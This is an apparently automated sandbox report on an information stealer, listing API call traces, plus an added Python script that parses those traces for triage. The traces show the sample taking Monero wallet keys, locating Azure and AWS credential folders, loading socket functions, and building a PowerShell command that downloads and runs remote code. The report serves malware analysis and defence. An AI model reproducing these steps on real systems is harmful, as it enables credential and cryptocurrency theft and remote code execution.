                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FolderPathlstrcat
                                  • String ID: \..\
                                  • API String ID: 2938889746-4220915743
                                  • Opcode ID: 77e70e663bef21d806bf5fa14ab3f977e34dc4c1db1fb38ec701acc997d57430
                                  • Instruction ID: a3ad2af536fa1fb9fdec17ffbb7599e39fb8aaa443c449d25751ff227cd07a35
                                  • Opcode Fuzzy Hash: 77e70e663bef21d806bf5fa14ab3f977e34dc4c1db1fb38ec701acc997d57430
                                  • Instruction Fuzzy Hash: 50F191709216069FDB21EF64D84DBAEB7B9AF44340F648228F845DB291DB34DC69CF90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C43A3
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C43D6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C43FE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C4409
                                  • lstrlen.KERNEL32(\storage\default\), ref: 002C4414
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4431
                                  • lstrcat.KERNEL32(00000000,\storage\default\), ref: 002C443D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4466
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C4471
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4498
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C44D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C44DF
                                  • lstrlen.KERNEL32(002E1794), ref: 002C44EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4507
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C4513
                                  • lstrlen.KERNEL32(.metadata-v2), ref: 002C451E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C453B
                                  • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 002C4547
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C456E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C45A0
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002C45A7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C4601
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C462A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C4653
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C467B
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C46AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                  • String ID: .metadata-v2$\storage\default\
                                  • API String ID: 1033685851-762053450
                                  • Opcode ID: 914673df60484e69c76fec1c36f3f0bf22c054791b9545ffa89cf27e31789d6e
                                  • Instruction ID: ecf99e35c2dfb5acabd4370d12a4320b2b1c57de777ee55e65c435fcefb3d6a7
                                  • Opcode Fuzzy Hash: 914673df60484e69c76fec1c36f3f0bf22c054791b9545ffa89cf27e31789d6e
                                  • Instruction Fuzzy Hash: 10B17E70A316479BDB21FF74DD99EAF77A9AF10340F644228B885E7252DB30DC258B90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C57D5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002C5804
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5835
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C585D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C5868
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5890
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C58C8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C58D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C58F8
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C592E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5956
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C5961
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5988
                                  • lstrlen.KERNEL32(002E1794), ref: 002C599A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C59B9
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C59C5
                                  • lstrlen.KERNEL32(011CD580), ref: 002C59D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C59F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C5A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5A2C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5A58
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002C5A5F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C5AB7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C5B2D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C5B56
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C5B89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5BB5
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C5BEF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C5C4C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C5C70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2428362635-0
                                  • Opcode ID: 7f017c93746be3aba647bfadb2927914b2fadfb7e768d57a9d21e0af83b9ec0e
                                  • Instruction ID: ad38761a52b3ebf71dca900953d4278bf9bad6ca04fb494c1f9bb52e0e0f69a6
                                  • Opcode Fuzzy Hash: 7f017c93746be3aba647bfadb2927914b2fadfb7e768d57a9d21e0af83b9ec0e
                                  • Instruction Fuzzy Hash: B402C370920A16DFDB21EF68C889EEEBBB5AF44340F14422CF845A7251DB34EC95CB90
                                  APIs
                                    • Part of subcall function 002B1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B1135
                                    • Part of subcall function 002B1120: RtlAllocateHeap.NTDLL(00000000), ref: 002B113C
                                    • Part of subcall function 002B1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 002B1159
                                    • Part of subcall function 002B1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 002B1173
                                    • Part of subcall function 002B1120: RegCloseKey.ADVAPI32(?), ref: 002B117D
                                  • lstrcat.KERNEL32(?,00000000), ref: 002B11C0
                                  • lstrlen.KERNEL32(?), ref: 002B11CD
                                  • lstrcat.KERNEL32(?,.keys), ref: 002B11E8
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B121F
                                  • lstrlen.KERNEL32(011C9248), ref: 002B122D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1251
                                  • lstrcat.KERNEL32(00000000,011C9248), ref: 002B1259
                                  • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 002B1264
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1288
                                  • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 002B1294
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B12BA
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B12FF
                                  • lstrlen.KERNEL32(011CD688), ref: 002B130E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1335
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B133D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1378
                                  • lstrcat.KERNEL32(00000000), ref: 002B1385
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B13AC
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 002B13D5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1401
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B143D
                                    • Part of subcall function 002CEDE0: lstrcpy.KERNEL32(00000000,?), ref: 002CEE12
                                  • DeleteFileA.KERNEL32(?), ref: 002B1471
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                  • String ID: .keys$\Monero\wallet.keys
                                  • API String ID: 2881711868-3586502688
                                  • Opcode ID: f5be86d62ea208ede6907f7f4b8a432e4ae7c181bbad310b0173c81179a33f17
                                  • Instruction ID: c0ffff875f40be277dd41765c5bd77d272a28c1e3a6098f6912b6377c5bf4795
                                  • Opcode Fuzzy Hash: f5be86d62ea208ede6907f7f4b8a432e4ae7c181bbad310b0173c81179a33f17
                                  • Instruction Fuzzy Hash: 98A1A271A202169BDB21EF74DC89AEEB7B9AF44380F544064F949E7242DB30ED25CF94
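The API lists in these entries are the part of the report that matters for triage. The entry above opens HKCU\SOFTWARE\monero-project\monero-core and queries wallet_path, appends .keys, concatenates \Monero\wallet.keys, then calls CopyFileA and DeleteFileA; the entry that follows resolves CSIDL 0x28 (user profile) twice and 0x1C (local application data) once with SHGetFolderPathA and appends \.azure\, \.aws\ and \.IdentityService\. The Python below is an added example, not part of this report and not Joe Sandbox code: it parses bullet lines in exactly the format shown here into structured calls and summarises, per function, the registry values, folder roots, string literals and file operations. The sample lines are copied from the two entries named; the CSIDL and HKEY numbers are the Windows SDK constants; the pairing of a folder root with the next backslash-prefixed literal passed to lstrcat is a heuristic of this example, not something the report states.

```python
"""Parse Joe Sandbox "APIs" bullets and summarise what one function touches.
Added example for this report; not Joe Sandbox code."""
import re
from collections import Counter

# Windows SDK constants for the values that occur in this report.
CSIDL_NAMES = {0x1A: "%APPDATA%", 0x1C: "%LOCALAPPDATA%", 0x28: "%USERPROFILE%"}
HIVE_NAMES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
FILE_OPS = {"CopyFileA", "DeleteFileA", "FindFirstFileA", "FindNextFileA",
            "FindClose", "GetFileAttributesA"}

# One bullet, e.g.
#   • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 002B1294
#   • memset.MSVCRT ref: 002CE740
#   • Part of subcall function 002B1120: RegCloseKey.ADVAPI32(?), ref: 002B117D
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r"\s*,?\s*(?:ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_line(line):
    """Return a dict for an API bullet, or None for headings and other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = []
    # Joe Sandbox separates arguments with commas; a literal containing a
    # comma would be split here as well (none occur in this report).
    for a in (m.group("args") or "").split(","):
        a = a.strip()
        if not a:
            continue
        if HEX8.match(a):
            args.append(int(a, 16))   # pointer or integer argument
        elif a == "?":
            args.append(None)         # value the sandbox did not recover
        else:
            args.append(a)            # string literal resolved by the sandbox
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": m.group("ref"), "subcall": m.group("sub")}


def summarize(lines):
    """Aggregate one function's bullets into triage-friendly facts."""
    calls = [c for c in map(parse_line, lines) if c]
    strings, registry, targets, file_ops = [], [], [], []
    root, cur_key = None, None
    for c in calls:
        a = c["args"]
        for s in a:
            if isinstance(s, str) and s not in strings:
                strings.append(s)
        if c["api"] == "SHGetFolderPathA" and len(a) > 1 and isinstance(a[1], int):
            root = CSIDL_NAMES.get(a[1], "CSIDL_0x%X" % a[1])
        elif c["api"] == "RegOpenKeyExA" and len(a) > 1 and isinstance(a[1], str):
            hive = HIVE_NAMES.get(a[0], "HKEY_0x%X" % a[0]) if isinstance(a[0], int) else "?"
            cur_key = hive + "\\" + a[1]
        elif c["api"] == "RegQueryValueExA" and len(a) > 1 and isinstance(a[1], str):
            registry.append((cur_key or "?") + "\\" + a[1])
        elif c["api"] in FILE_OPS:
            file_ops.append(c["api"])
        # Heuristic (this example's assumption): a backslash-prefixed literal
        # passed to lstrcat after a SHGetFolderPathA call hangs off that root.
        if c["api"] == "lstrcat" and len(a) > 1 and isinstance(a[1], str) and a[1].startswith("\\"):
            targets.append((root or "<unresolved>") + a[1])
    return {"apis": Counter(c["api"] for c in calls), "strings": strings,
            "registry": registry, "targets": targets, "file_ops": file_ops}


# Lines copied from two function entries in this report.
MONERO_TRACE = r"""
• Part of subcall function 002B1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 002B1159
• Part of subcall function 002B1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 002B1173
• Part of subcall function 002B1120: RegCloseKey.ADVAPI32(?), ref: 002B117D
• lstrcat.KERNEL32(?,.keys), ref: 002B11E8
• lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 002B1294
• CopyFileA.KERNEL32(?,?,00000001), ref: 002B13D5
• DeleteFileA.KERNEL32(?), ref: 002B1471
""".strip().splitlines()

CLOUD_TRACE = r"""
• memset.MSVCRT ref: 002CE740
• SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 002CE769
• lstrcat.KERNEL32(?,\.azure\), ref: 002CE7C6
• SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 002CE82D
• lstrcat.KERNEL32(?,\.aws\), ref: 002CE886
• SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002CE8F1
• lstrcat.KERNEL32(?,\.IdentityService\), ref: 002CE947
""".strip().splitlines()

if __name__ == "__main__":
    for name, trace in (("monero", MONERO_TRACE), ("cloud", CLOUD_TRACE)):
        print(name, summarize(trace))
```

Run it directly to print both summaries, or paste any other entry's bullets from this report into a list and pass it to summarize() to get the same breakdown; headings such as "APIs", "Strings" and the "Associated:" dump lines are ignored by parse_line.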
                                  APIs
                                  • memset.MSVCRT ref: 002CE740
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 002CE769
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE79F
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CE7AD
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 002CE7C6
                                  • memset.MSVCRT ref: 002CE805
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 002CE82D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE85F
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CE86D
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 002CE886
                                  • memset.MSVCRT ref: 002CE8C5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002CE8F1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE920
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CE92E
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 002CE947
                                  • memset.MSVCRT ref: 002CE986
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$memset$FolderPathlstrcpy
                                  • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 4067350539-3645552435
                                  • Opcode ID: cbd365ec8e242c30e8520fdef743b9a5862a3cdf9b9fa7d0cf0a3be2d36d23a1
                                  • Instruction ID: 391d03a278cf82678bae8fbdb4adce2b9934f9cbcc42b6d93c49917b02a5a064
                                  • Opcode Fuzzy Hash: cbd365ec8e242c30e8520fdef743b9a5862a3cdf9b9fa7d0cf0a3be2d36d23a1
                                  • Instruction Fuzzy Hash: 6B712A71E60259ABDB21EF64DC86FED7374AF48700F5004A8B719AB1C1DA709E588F94
                                  APIs
                                  • lstrcpy.KERNEL32 ref: 002CABCF
                                  • lstrlen.KERNEL32(011CE130), ref: 002CABE5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAC0D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002CAC18
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAC41
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAC84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002CAC8E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CACB7
                                  • lstrlen.KERNEL32(002E4AD4), ref: 002CACD1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CACF3
                                  • lstrcat.KERNEL32(00000000,002E4AD4), ref: 002CACFF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAD28
                                  • lstrlen.KERNEL32(002E4AD4), ref: 002CAD3A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAD5C
                                  • lstrcat.KERNEL32(00000000,002E4AD4), ref: 002CAD68
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAD91
                                  • lstrlen.KERNEL32(011CE160), ref: 002CADA7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CADCF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002CADDA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAE03
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CAE3F
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002CAE49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAE6F
                                  • lstrlen.KERNEL32(00000000), ref: 002CAE85
                                  • lstrcpy.KERNEL32(00000000,011CE058), ref: 002CAEB8
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen
                                  • String ID: f
                                  • API String ID: 2762123234-1993550816
                                  • Opcode ID: 9ffe610ce2fc5a0df074545ab6385e6d3bdef5e536be17109adadda272a5f428
                                  • Instruction ID: 0eb56905dfc6e2ae604ef7827da927dee8ee3364dc4f30d7483f4c51aa3edf90
                                  • Opcode Fuzzy Hash: 9ffe610ce2fc5a0df074545ab6385e6d3bdef5e536be17109adadda272a5f428
                                  • Instruction Fuzzy Hash: BCB18D3093161BDBDB22EF64DD88BAEB3B5AF40344F144628B845A7291DB30DD25CB91
                                  APIs
                                  • LoadLibraryA.KERNEL32(ws2_32.dll,?,002C72A4), ref: 002D47E6
                                  • GetProcAddress.KERNEL32(00000000,connect), ref: 002D47FC
                                  • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 002D480D
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 002D481E
                                  • GetProcAddress.KERNEL32(00000000,htons), ref: 002D482F
                                  • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 002D4840
                                  • GetProcAddress.KERNEL32(00000000,recv), ref: 002D4851
                                  • GetProcAddress.KERNEL32(00000000,socket), ref: 002D4862
                                  • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 002D4873
                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 002D4884
                                  • GetProcAddress.KERNEL32(00000000,send), ref: 002D4895
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                  • API String ID: 2238633743-3087812094
                                  • Opcode ID: 48ff9c8c0684ac2cfc334e2e0a18605f819ebe386ccf52cdc8669b4c15d8577f
                                  • Instruction ID: 7e426298c0500da8e817522c74d7be8842bd48b62727a79738591484b0b40f17
                                  • Opcode Fuzzy Hash: 48ff9c8c0684ac2cfc334e2e0a18605f819ebe386ccf52cdc8669b4c15d8577f
                                  • Instruction Fuzzy Hash: 701137B19B17F0AFCB109F7AAC8DA553A78BB06709384093EF059DE1A2DAF44510DB58
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CBE53
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CBE86
                                  • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 002CBE91
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CBEB1
                                  • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 002CBEBD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CBEE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002CBEEB
                                  • lstrlen.KERNEL32(')"), ref: 002CBEF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CBF13
                                  • lstrcat.KERNEL32(00000000,')"), ref: 002CBF1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CBF46
                                  • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 002CBF66
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CBF88
                                  • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 002CBF94
